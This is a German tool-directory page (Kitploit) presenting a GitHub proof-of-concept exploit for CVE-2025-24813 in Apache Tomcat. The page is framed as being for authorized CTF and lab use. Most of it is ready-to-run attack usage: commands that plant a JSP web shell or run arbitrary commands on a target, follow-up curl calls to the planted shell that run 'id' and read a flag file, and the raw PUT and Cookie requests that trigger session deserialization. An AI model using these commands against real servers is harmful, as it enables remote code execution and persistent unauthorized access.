Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-24813 — Das richtige Payload für Java-CVE | Kitploit
Tools/GitHubGitHub/loufa0/cve-2025-24813
SchwachstellenscannerExploitationWebsicherheitCTFLernen & BildungLabs & Praxis
GitHubloufa0/cve-2025-24813

CVE-2025-24813

Das richtige Payload für Java-CVE

Repository anzeigen
52vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-24813 Tomcat PoC

PoC für eine autorisierte CTF-/Lab-Umgebung. Es nutzt CVE-2025-24813 über das partielle PUT-Schreiben einer Tomcat-Session-Datei aus und löst anschließend die Deserialisierung mit JSESSIONID aus.

Voraussetzungen

  • Python 3
  • Python-Modul requests
  • Java JDK (java und javac)
  • Die enthaltene Datei commons-collections-3.2.1.jar, platziert in diesem Verzeichnis

ysoserial wird nicht benötigt.

Dateien

  • poc_cve_2025_24813.py: Python-Wrapper, der Generierung, Upload und Trigger automatisiert.
  • GenerateTomcatSessionPayload.java: erzeugt eine gültige Tomcat-Session, die ein -Gadget enthält.
Tool herunterladen
CommonsCollections
  • commons-collections-3.2.1.jar: Abhängigkeit des Gadgets.
  • sh.jsp: optionaler JSP-Shell, der per --drop-shell bereitgestellt wird.
  • Verwendung

    Einen JSP-Shell im Standard-Webroot /opt/tomcat/webapps/ROOT ablegen:

    root@kitploit:~
    ./poc_cve_2025_24813.py http://TARGET:8080 \
      --session-id poc24813 \
      --drop-shell \
      --shell-name sh.jsp
    

    Einen direkten Befehl ausführen, ohne einen Shell abzulegen:

    root@kitploit:~
    ./poc_cve_2025_24813.py http://TARGET:8080 \
      --session-id cmd24813 \
      --cmd 'id > /opt/tomcat/webapps/ROOT/rce.txt'
    

    Falls sich das Webroot unterscheidet:

    root@kitploit:~
    ./poc_cve_2025_24813.py http://TARGET:8080 \
      --drop-shell \
      --webroot /path/to/webroot \
      --shell-name sh.jsp
    

    Falls das JAR verschoben wurde, dessen Pfad angeben:

    root@kitploit:~
    ./poc_cve_2025_24813.py http://TARGET:8080 \
      --jar /path/to/commons-collections-3.2.1.jar \
      --drop-shell
    

    Nach der Ausnutzung

    Falls --drop-shell erfolgreich war:

    root@kitploit:~
    curl --get --data-urlencode 'cmd=id' http://TARGET:8080/sh.jsp
    curl --get --data-urlencode 'cmd=cat /opt/tomcat/user.flg' http://TARGET:8080/sh.jsp
    

    Bedingungen auf der Zielseite

    • Verwundbare Tomcat-Version.
    • DefaultServlet beschreibbar, typischerweise readonly=false.
    • Unterstützung für partielles PUT.
    • Persistente Sessions über PersistentManager und FileStore.
    • Gadget-Kette auf dem Server verfügbar, hier commons-collections.

    Das erwartete Verhalten beim Upload ist häufig HTTP 409 Conflict auf:

    root@kitploit:~
    PUT /<session-id>/session
    Content-Range: bytes 0-1000/1200
    

    Danach wird die Deserialisierung ausgelöst mit:

    root@kitploit:~
    Cookie: JSESSIONID=.<session-id>